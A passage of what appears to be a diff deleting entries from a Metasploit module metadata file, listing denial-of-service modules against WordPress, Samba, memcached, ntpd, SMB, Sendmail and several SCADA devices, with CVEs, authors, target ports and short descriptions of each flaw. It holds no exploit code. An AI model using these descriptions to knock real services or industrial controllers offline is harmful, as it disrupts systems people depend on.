1.8.7\n to 1.8.7-p71, and 1.9 to r18423 allows for a DoS\n (CPU consumption) via a crafted HTTP request.", - "references": [ - "BID-30644", - "CVE-2008-3656", - "OSVDB-47471", - "URL-http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/http/webrick_regex.rb", - "is_install_path": true, - "ref_name": "dos/http/webrick_regex", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/wordpress_directory_traversal_dos": { - "name": "WordPress Traversal Directory DoS", - "fullname": 
"auxiliary/dos/http/wordpress_directory_traversal_dos", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Yorick Koster", - "CryptisStudents" - ], - "description": "Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin\n function in wp-admin/includes/ajax-actions.php in WordPress before 4.6\n allows remote attackers to hijack the authentication of subscribers\n for /dev/random read operations by leveraging a late call to\n the check_ajax_referer function, a related issue to CVE-2016-6896.", - "references": [ - "CVE-2016-6897", - "EDB-40288", - "OVE-OVE-20160712-0036" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-03-22 12:52:15 +0000", - "path": "/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/wordpress_directory_traversal_dos", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/wordpress_long_password_dos": { - "name": "WordPress Long Password DoS", - "fullname": "auxiliary/dos/http/wordpress_long_password_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-11-20", - "type": "auxiliary", - "author": [ - "Javier Nieto Arevalo", - "Andres Rojas Guerrero", - "rastating" - ], - "description": "WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x\n before 4.0.1 allows remote attackers to cause a denial of service\n (CPU consumption) via a long password that is improperly handled\n during hashing.", - "references": [ - "CVE-2014-9016", - "URL-https://nvd.nist.gov/vuln/detail/CVE-2014-9034", - "OSVDB-114857", - "WPVDB-7681" - ], - "platform": "", - "arch": "", - "rport": 80, - 
"autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/wordpress_long_password_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/wordpress_long_password_dos", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/wordpress_xmlrpc_dos": { - "name": "Wordpress XMLRPC DoS", - "fullname": "auxiliary/dos/http/wordpress_xmlrpc_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-08-06", - "type": "auxiliary", - "author": [ - "Nir Goldshlager", - "Christian Mehlmauer " - ], - "description": "Wordpress XMLRPC parsing is vulnerable to a XML based denial of service.\n This vulnerability affects Wordpress 3.5 - 3.9.2 (3.8.4 and 3.7.4 are\n also patched).", - "references": [ - "CVE-2014-5266", - "URL-https://wordpress.org/news/2014/08/wordpress-3-9-2/", - "URL-http://www.breaksec.com/?p=6362", - "URL-https://mashable.com/archive/wordpress-xml-blowup-dos", - "URL-https://core.trac.wordpress.org/changeset/29404", - "WPVDB-7526" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/wordpress_xmlrpc_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/http/ws_dos": { - "name": "ws - Denial of Service", - "fullname": "auxiliary/dos/http/ws_dos", - "aliases": [], - "rank": 300, - "disclosure_date": 
null, - "type": "auxiliary", - "author": [ - "Ryan Knell, Sonatype Security Research", - "Nick Starke, Sonatype Security Research" - ], - "description": "This module exploits a Denial of Service vulnerability in npm module \"ws\".\n By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.", - "references": [ - "URL-https://nodesecurity.io/advisories/550", - "CWE-400" - ], - "platform": "", - "arch": "", - "rport": 3000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/dos/http/ws_dos.rb", - "is_install_path": true, - "ref_name": "dos/http/ws_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/mdns/avahi_portzero": { - "name": "Avahi Source Port 0 DoS", - "fullname": "auxiliary/dos/mdns/avahi_portzero", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-11-14", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "Avahi-daemon versions prior to 0.6.24 can be DoS'd\n with an mDNS packet with a source port of 0.", - "references": [ - "CVE-2008-5081", - "OSVDB-50929" - ], - "platform": "", - "arch": "", - "rport": 5353, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/mdns/avahi_portzero.rb", - "is_install_path": true, - "ref_name": "dos/mdns/avahi_portzero", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/mirageos/qubes_mirage_firewall_dos": { - "name": "Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit", - "fullname": "auxiliary/dos/mirageos/qubes_mirage_firewall_dos", - 
"aliases": [], - "rank": 300, - "disclosure_date": "2022-12-04", - "type": "auxiliary", - "author": [ - "Krzysztof Burghardt " - ], - "description": "This module allows remote attackers to cause a denial of service (DoS)\n in Mirage firewall for QubesOS 0.8.0-0.8.3 via a specifically crafted UDP request.", - "references": [ - "CVE-2022-46770", - "URL-https://mirage.io/blog/MSA03", - "URL-https://github.com/mirage/qubes-mirage-firewall/issues/166" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-02-05 12:04:59 +0000", - "path": "/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.rb", - "is_install_path": true, - "ref_name": "dos/mirageos/qubes_mirage_firewall_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/misc/dopewars": { - "name": "Dopewars Denial of Service", - "fullname": "auxiliary/dos/misc/dopewars", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-10-05", - "type": "auxiliary", - "author": [ - "Doug Prostko " - ], - "description": "The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to\n a lack of input validation.", - "references": [ - "CVE-2009-3591", - "OSVDB-58884", - "BID-36606" - ], - "platform": "", - "arch": "", - "rport": 7902, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/misc/dopewars.rb", - "is_install_path": true, - "ref_name": "dos/misc/dopewars", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/misc/ibm_sametime_webplayer_dos": { - "name": 
"IBM Lotus Sametime WebPlayer DoS", - "fullname": "auxiliary/dos/misc/ibm_sametime_webplayer_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-11-07", - "type": "auxiliary", - "author": [ - "Chris John Riley", - "kicks4kittens" - ], - "description": "This module exploits a known flaw in the IBM Lotus Sametime WebPlayer\n version 8.5.2.1392 (and prior) to cause a denial of service condition\n against specific users. For this module to function the target user\n must be actively logged into the IBM Lotus Sametime server and have\n the Sametime Audio Visual browser plug-in (WebPlayer) loaded as a\n browser extension. The user should have the WebPlayer plug-in active\n (i.e. be in a Sametime Audio/Video meeting for this DoS to work correctly.", - "references": [ - "CVE-2013-3986", - "OSVDB-99552", - "BID-63611", - "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21654041", - "URL-http://xforce.iss.net/xforce/xfdb/84969" - ], - "platform": "", - "arch": "", - "rport": 5060, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb", - "is_install_path": true, - "ref_name": "dos/misc/ibm_sametime_webplayer_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "CHECK", - "description": "Checking if targeted user is online" - }, - { - "name": "DOS", - "description": "Cause a Denial Of Service condition against a connected user" - } - ] - }, - "auxiliary_dos/misc/ibm_tsm_dos": { - "name": "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service", - "fullname": "auxiliary/dos/misc/ibm_tsm_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-12-15", - "type": "auxiliary", - "author": [ - "Gianni Gnesa", - "William Webb " - ], - "description": "This module exploits a denial of service 
condition present in IBM Tivoli Storage Manager\n FastBack Server when dealing with packets triggering the opcode 0x534 handler.", - "references": [ - "EDB-38979", - "OSVDB-132307" - ], - "platform": "", - "arch": "", - "rport": 11460, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/misc/ibm_tsm_dos.rb", - "is_install_path": true, - "ref_name": "dos/misc/ibm_tsm_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/misc/memcached": { - "name": "Memcached Remote Denial of Service", - "fullname": "auxiliary/dos/misc/memcached", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Gregory Man " - ], - "description": "This module sends a specially-crafted packet to cause a\n segmentation fault in memcached v1.4.15 or earlier versions.", - "references": [ - "URL-https://code.google.com/archive/p/memcached/issues/192", - "CVE-2011-4971", - "OSVDB-92867" - ], - "platform": "", - "arch": "", - "rport": 11211, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/misc/memcached.rb", - "is_install_path": true, - "ref_name": "dos/misc/memcached", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/ntp/ntpd_reserved_dos": { - "name": "NTP.org ntpd Reserved Mode Denial of Service", - "fullname": "auxiliary/dos/ntp/ntpd_reserved_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-10-04", - "type": "auxiliary", - "author": [ - "todb " - ], - "description": "This module exploits a denial of service vulnerability\n within the NTP (network time protocol) demon. 
By sending\n a single packet to a vulnerable ntpd server (Victim A),\n spoofed from the IP address of another vulnerable ntpd server\n (Victim B), both victims will enter an infinite response loop.\n Note, unless you control the spoofed source host or the real\n remote host(s), you will not be able to halt the DoS condition\n once begun!", - "references": [ - "BID-37255", - "CVE-2009-3563", - "OSVDB-60847", - "URL-https://bugs.ntp.org/show_bug.cgi?id=1331" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb", - "is_install_path": true, - "ref_name": "dos/ntp/ntpd_reserved_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/pptp/ms02_063_pptp_dos": { - "name": "MS02-063 PPTP Malformed Control Data Kernel Denial of Service", - "fullname": "auxiliary/dos/pptp/ms02_063_pptp_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2002-09-26", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module exploits a kernel based overflow when sending abnormal PPTP Control Data\n packets\tto Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers\n (Remote Access Services). 
Kernel memory is overwritten resulting in a BSOD.\n Code execution may be possible however this module is only a DoS.", - "references": [ - "BID-5807", - "CVE-2002-1214", - "OSVDB-13422", - "MSB-MS02-063" - ], - "platform": "", - "arch": "", - "rport": 1723, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb", - "is_install_path": true, - "ref_name": "dos/pptp/ms02_063_pptp_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/rpc/rpcbomb": { - "name": "RPC DoS targeting *nix rpcbind/libtirpc", - "fullname": "auxiliary/dos/rpc/rpcbomb", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "guidovranken", - "Pearce Barry " - ], - "description": "This module exploits a vulnerability in certain versions of\n rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger\n large (and never freed) memory allocations for XDR strings on\n the target.", - "references": [ - "CVE-2017-8779", - "BID-98325", - "URL-http://openwall.com/lists/oss-security/2017/05/03/12" - ], - "platform": "", - "arch": "", - "rport": 111, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/rpc/rpcbomb.rb", - "is_install_path": true, - "ref_name": "dos/rpc/rpcbomb", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/samba/lsa_addprivs_heap": { - "name": "Samba lsa_io_privilege_set Heap Overflow", - "fullname": "auxiliary/dos/samba/lsa_addprivs_heap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This 
module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.", - "references": [ - "CVE-2007-2446", - "OSVDB-34699" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb", - "is_install_path": true, - "ref_name": "dos/samba/lsa_addprivs_heap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/samba/lsa_transnames_heap": { - "name": "Samba lsa_io_trans_names Heap Overflow", - "fullname": "auxiliary/dos/samba/lsa_transnames_heap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.", - "references": [ - "CVE-2007-2446", - "OSVDB-34699" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/samba/lsa_transnames_heap.rb", - "is_install_path": true, - "ref_name": "dos/samba/lsa_transnames_heap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/samba/read_nttrans_ea_list": { - "name": "Samba read_nttrans_ea_list Integer Overflow", - "fullname": "auxiliary/dos/samba/read_nttrans_ea_list", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Jeremy Allison", - "dz_lnly" - ], - "description": "Integer overflow in the read_nttrans_ea_list function in nttrans.c in\n smbd in Samba 3.x 
before 3.5.22, 3.6.x before 3.6.17, and 4.x before\n 4.0.8 allows remote attackers to cause a denial of service (memory\n consumption) via a malformed packet. Important Note: in order to work,\n the \"ea support\" option on the target share must be enabled.", - "references": [ - "OSVDB-95969", - "BID-61597", - "EDB-27778", - "CVE-2013-4124" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2021-01-28 10:35:25 +0000", - "path": "/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb", - "is_install_path": true, - "ref_name": "dos/samba/read_nttrans_ea_list", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/sap/sap_soap_rfc_eps_delete_file": { - "name": "SAP SOAP EPS_DELETE_FILE File Deletion", - "fullname": "auxiliary/dos/sap/sap_soap_rfc_eps_delete_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Alexey Sintsov", - "nmonkee" - ], - "description": "This module abuses the SAP NetWeaver EPS_DELETE_FILE function, on the SAP SOAP\n RFC Service, to delete arbitrary files on the remote file system. 
The module can\n also be used to capture SMB hashes by using a fake SMB share as DIRNAME.", - "references": [ - "OSVDB-74780", - "URL-http://dsecrg.com/pages/vul/show.php?id=331", - "URL-https://launchpad.support.sap.com/#/notes/1554030" - ], - "platform": "", - "arch": "", - "rport": 8000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb", - "is_install_path": true, - "ref_name": "dos/sap/sap_soap_rfc_eps_delete_file", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/scada/allen_bradley_pccc": { - "name": "DoS Exploitation of Allen-Bradley's Legacy Protocol (PCCC)", - "fullname": "auxiliary/dos/scada/allen_bradley_pccc", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "José Diogo Monteiro ", - "Luis Rosa ", - "Miguel Borges de Freitas " - ], - "description": "A remote, unauthenticated attacker could send a single, specially crafted\n Programmable Controller Communication Commands (PCCC) packet to the controller\n that could potentially cause the controller to enter a DoS condition.\n MicroLogix 1100 controllers are affected: 1763-L16BWA, 1763-L16AWA, 1763-L16BBB, and\n 1763-L16DWD.\n CVE-2017-7924 has been assigned to this vulnerability.\n A CVSS v3 base score of 7.5 has been assigned.", - "references": [ - "CVE-2017-7924", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-17-138-03", - "URL-http://web.archive.org/web/20250116210051/https://dl.acm.org/doi/10.1145/3174776.3174780" - ], - "platform": "", - "arch": "", - "rport": 44818, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": 
"/modules/auxiliary/dos/scada/allen_bradley_pccc.rb", - "is_install_path": true, - "ref_name": "dos/scada/allen_bradley_pccc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/scada/beckhoff_twincat": { - "name": "Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS", - "fullname": "auxiliary/dos/scada/beckhoff_twincat", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-09-13", - "type": "auxiliary", - "author": [ - "Luigi Auriemma", - "jfa" - ], - "description": "The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending\n a crafted UDP packet to port 48899 (TCATSysSrv.exe).", - "references": [ - "CVE-2011-3486", - "OSVDB-75495", - "URL-http://aluigi.altervista.org/adv/twincat_1-adv.txt" - ], - "platform": "", - "arch": "", - "rport": 48899, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/scada/beckhoff_twincat.rb", - "is_install_path": true, - "ref_name": "dos/scada/beckhoff_twincat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/scada/d20_tftp_overflow": { - "name": "General Electric D20ME TFTP Server Buffer Overflow DoS", - "fullname": "auxiliary/dos/scada/d20_tftp_overflow", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-19", - "type": "auxiliary", - "author": [ - "K. 
Reid Wightman ", - "todb " - ], - "description": "By sending a malformed TFTP request to the GE D20ME, it is possible to crash the\n device.\n\n This module is based on the original 'd20ftpbo.rb' Basecamp module from\n DigitalBond.", - "references": [ - "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" - ], - "platform": "", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2021-01-28 10:35:25 +0000", - "path": "/modules/auxiliary/dos/scada/d20_tftp_overflow.rb", - "is_install_path": true, - "ref_name": "dos/scada/d20_tftp_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/scada/igss9_dataserver": { - "name": "7-Technologies IGSS 9 IGSSdataServer.exe DoS", - "fullname": "auxiliary/dos/scada/igss9_dataserver", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-12-20", - "type": "auxiliary", - "author": [ - "jfa" - ], - "description": "The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be\n brought down by sending a crafted TCP packet to port 12401. 
This should also work\n for version <= 9.0.0.1120, but that version hasn't been tested.", - "references": [ - "CVE-2011-4050", - "OSVDB-77976", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-335-01" - ], - "platform": "", - "arch": "", - "rport": 12401, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/scada/igss9_dataserver.rb", - "is_install_path": true, - "ref_name": "dos/scada/igss9_dataserver", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/scada/siemens_siprotec4": { - "name": "Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service", - "fullname": "auxiliary/dos/scada/siemens_siprotec4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "M. Can Kurnaz" - ], - "description": "This module sends a specially crafted packet to port 50000/UDP\n causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.\n A manual reboot is required to return the device to service.\n CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.", - "references": [ - "EDB-44103", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-15-202-01" - ], - "platform": "", - "arch": "", - "rport": 50000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/scada/siemens_siprotec4.rb", - "is_install_path": true, - "ref_name": "dos/scada/siemens_siprotec4", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/scada/yokogawa_logsvr": { - "name": "Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer 
Overflow", - "fullname": "auxiliary/dos/scada/yokogawa_logsvr", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-03-10", - "type": "auxiliary", - "author": [ - "juan vazquez ", - "Redsadic " - ], - "description": "This module abuses a buffer overflow vulnerability to trigger a Denial of Service\n of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability\n exists in the handling of malformed log packets, with an unexpected long level field.\n The root cause of the vulnerability is a combination of usage of uninitialized memory\n from the stack and a dangerous string copy. This module has been tested successfully\n on Yokogawa CENTUM CS 3000 R3.08.50.", - "references": [ - "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf", - "URL-http://web.archive.org/web/20221209030848/https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/", - "CVE-2014-0781" - ], - "platform": "", - "arch": "", - "rport": 52302, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/dos/scada/yokogawa_logsvr.rb", - "is_install_path": true, - "ref_name": "dos/scada/yokogawa_logsvr", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/smb/smb_loris": { - "name": "SMBLoris NBSS Denial of Service", - "fullname": "auxiliary/dos/smb/smb_loris", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-06-29", - "type": "auxiliary", - "author": [ - "thelightcosine", - "Adam Cammack " - ], - "description": "The SMBLoris attack consumes large chunks of memory in the target by sending\n SMB requests with the NetBios Session Service(NBSS) Length Header value set\n to the maximum possible value. 
By keeping these connections open and initiating\n large numbers of these sessions, the memory does not get freed, and the server\n grinds to a halt. This vulnerability was originally disclosed by Sean Dillon\n and Zach Harding.\n\n DISCALIMER: This module opens a lot of simultaneous connections. Please check\n your system's ULIMIT to make sure it can handle it. This module will also run\n continuously until stopped.", - "references": [ - "URL-https://web.archive.org/web/20170804072329/https://smbloris.com/", - "AKA-SMBLoris" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/smb/smb_loris.rb", - "is_install_path": true, - "ref_name": "dos/smb/smb_loris", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/smtp/sendmail_prescan": { - "name": "Sendmail SMTP Address prescan Memory Corruption", - "fullname": "auxiliary/dos/smtp/sendmail_prescan", - "aliases": [], - "rank": 300, - "disclosure_date": "2003-09-17", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This is a proof of concept denial of service module for Sendmail versions\n 8.12.8 and earlier. The vulnerability is within the prescan() method when\n parsing SMTP headers. 
Due to the prescan function, only 0x5c and 0x00\n bytes can be used, limiting the likelihood for arbitrary code execution.", - "references": [ - "OSVDB-2577", - "CVE-2003-0694", - "BID-8641", - "EDB-24" - ], - "platform": "", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": null, - "mod_time": "2023-01-04 14:45:58 +0000", - "path": "/modules/auxiliary/dos/smtp/sendmail_prescan.rb", - "is_install_path": true, - "ref_name": "dos/smtp/sendmail_prescan", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/solaris/lpd/cascade_delete": { - "name": "Solaris LPD Arbitrary File Delete", - "fullname": "auxiliary/dos/solaris/lpd/cascade_delete", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm ", - "Optyx " - ], - "description": "This module uses a vulnerability in the Solaris line printer\n daemon to delete arbitrary files on an affected system. This\n can be used to exploit the rpc.walld format string flaw, the\n missing krb5.conf authentication bypass, or simply delete\n system files. 
Tested on Solaris 2.6, 7, 8, 9, and 10.", - "references": [ - "CVE-2005-4797", - "BID-14510", - "OSVDB-18650" - ], - "platform": "", - "arch": "", - "rport": 515, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb", - "is_install_path": true, - "ref_name": "dos/solaris/lpd/cascade_delete", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/ssl/dtls_changecipherspec": { - "name": "OpenSSL DTLS ChangeCipherSpec Remote DoS", - "fullname": "auxiliary/dos/ssl/dtls_changecipherspec", - "aliases": [], - "rank": 300, - "disclosure_date": "2000-04-26", - "type": "auxiliary", - "author": [ - "Jon Oberheide ", - "theLightCosine " - ], - "description": "This module performs a Denial of Service Attack against Datagram TLS in OpenSSL\n version 0.9.8i and earlier. 
